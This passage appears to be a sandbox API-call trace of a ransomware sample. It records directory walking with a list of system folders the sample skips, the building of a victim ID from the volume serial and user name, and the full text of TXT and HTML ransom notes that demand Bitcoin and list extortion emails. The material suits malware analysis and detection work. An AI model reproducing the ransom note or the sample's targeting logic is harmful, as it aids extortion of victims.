	[0168.026] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_queue.ico", cAlternateFileName="")) returned 1
	[0168.026] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_.ico", cAlternateFileName="")) returned 1
	[0168.026] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_property.ico", cAlternateFileName="")) returned 1
	[0168.026] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21344266, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x21344266, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1
	[0168.026] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 1
	[0168.026] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 0
	[0168.026] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0168.027] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0168.027] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0
	[0168.027] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0168.027] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0168.028] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 0
	[0168.028] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0168.028] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0168.029] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1
	[0168.029] lstrcmpW (lpString1="DeviceSync", lpString2="..") returned 1
	[0168.029] lstrcmpW (lpString1="DeviceSync", lpString2=".") returned 1
	[0168.029] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0168.029] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0168.029] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="DeviceSync" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync") returned="C:\\Users\\All Users\\Microsoft\\DeviceSync"
	[0168.029] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\DeviceSync" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync") returned="C:\\Users\\All Users\\Microsoft\\DeviceSync"
	[0168.029] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync\\") returned="C:\\Users\\All Users\\Microsoft\\DeviceSync\\"
	[0168.030] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\DeviceSync\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync\\") returned="C:\\Users\\All Users\\Microsoft\\DeviceSync\\"
	[0168.030] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*") returned="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*"
	[0168.030] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0168.030] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*") returned 43
	[0168.031] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.031] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\devicesync\\*.*") returned 0x2b
	[0168.032] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.032] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="windows") returned 0x0
	[0168.032] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.032] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="boot") returned 0x0
	[0168.032] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.033] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="system volume information") returned 0x0
	[0168.033] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.033] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.033] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.033] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="temp") returned 0x0
	[0168.033] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.033] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="program files") returned 0x0
	[0168.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.034] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.034] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="appdata") returned 0x0
	[0168.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.034] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="application data") returned 0x0
	[0168.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.035] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="winnt") returned 0x0
	[0168.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.035] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="tmp") returned 0x0
	[0168.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.035] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="cache") returned 0x0
	[0168.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.035] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.036] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="webcache") returned 0x0
	[0168.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.036] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="inetcache") returned 0x0
	[0168.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.036] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="nvidia") returned 0x0
	[0168.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="packages") returned 0x0
	[0168.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="cookies") returned 0x0
	[0168.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="programdata") returned 0x0
	[0168.037] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.037] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0168.038] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0168.038] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0168.038] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\DeviceSync" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync") returned="C:\\Users\\All Users\\Microsoft\\DeviceSync"
	[0168.038] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*") returned="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*"
	[0168.038] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.039] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.039] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\DeviceSync\\HELP_DECRYPT_YOUR_FILES.TXT") returned 67
	[0168.039] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0168.040] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0168.040] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0168.044] CloseHandle (hObject=0x384) returned 1
	[0168.045] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.045] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0168.046] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0168.047] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0168.047] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0168.048] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0168.048] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0168.048] CloseHandle (hObject=0x384) returned 1
	[0168.048] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.049] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.049] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0168.049] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\DeviceSync\\HELP_DECRYPT_YOUR_FILES.HTML") returned 68
	[0168.049] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0168.050] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0168.050] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0168.053] CloseHandle (hObject=0x384) returned 1
	[0168.053] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.054] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.054] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.054] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0168.055] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.055] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0168.056] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0168.056] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.056] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0168.056] CloseHandle (hObject=0x384) returned 1
	[0168.057] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7db2bb72, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0168.057] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*") returned 43
	[0168.057] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.058] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\devicesync\\*.*") returned 0x2b
	[0168.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.058] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="windows") returned 0x0
	[0168.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.058] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="boot") returned 0x0
	[0168.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.058] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="system volume information") returned 0x0
	[0168.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.059] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.059] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="temp") returned 0x0
	[0168.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.059] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="program files") returned 0x0
	[0168.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.059] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="appdata") returned 0x0
	[0168.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="application data") returned 0x0
	[0168.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="winnt") returned 0x0
	[0168.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="tmp") returned 0x0
	[0168.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="cache") returned 0x0
	[0168.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="webcache") returned 0x0
	[0168.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="inetcache") returned 0x0
	[0168.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.062] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="nvidia") returned 0x0
	[0168.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.062] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="packages") returned 0x0
	[0168.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.070] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="cookies") returned 0x0
	[0168.070] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
